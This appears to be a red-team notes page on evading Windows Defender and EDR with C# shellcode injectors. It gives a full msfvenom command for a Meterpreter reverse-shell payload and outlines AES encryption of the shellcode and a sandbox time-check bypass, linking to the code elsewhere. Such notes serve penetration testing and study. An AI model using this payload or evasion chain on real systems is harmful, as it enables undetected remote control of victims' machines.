# Evasion and bypassing detection within C\# ## Overview AV and EDR bypass techniques for C# assembly payloads. ## Experiment In this experiment we will be using the NTAPI injector as our baseline. {% content-ref url="../../execution/c-.net-assembly/process-injection/using-ntapi-undocumented-functions" %} [using-ntapi-undocumented-functions](https://rfc1918.gitbook.io/offsec/execution/c-.net-assembly/process-injection/using-ntapi-undocumented-functions) {% endcontent-ref %} ### Msfvenom payload ```bash msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f raw EXITFUNC=thread -o shellcode.bin ``` ### Injector without any shellcode For our baseline we tested the raw injector code without any shellcode in the payload.

### Raw Meterpreter payload shellcode Running injector with raw Meterpreter shellcode.

### Using AES encryption Encrypting the shellcode using AES {% content-ref url="evasion-and-bypassing-detection-within-c/encryptors/aes-encryptor" %} [aes-encryptor](https://rfc1918.gitbook.io/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c/encryptors/aes-encryptor) {% endcontent-ref %}

### Runner it twice and defender is not so nice So interesting, when executing it a second time Defenders behavioral analysis flagged and blocked execution. Adding a sleep accelerator check to bypass sandboxing seems to do the trick to bypass this a second time. {% content-ref url="evasion-and-bypassing-detection-within-c/sandbox-evasion/time-accelerated-checks" %} [time-accelerated-checks](https://rfc1918.gitbook.io/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c/sandbox-evasion/time-accelerated-checks) {% endcontent-ref %}

## References {% content-ref url="../../execution/c-.net-assembly" %} [c-.net-assembly](https://rfc1918.gitbook.io/offsec/execution/c-.net-assembly) {% endcontent-ref %}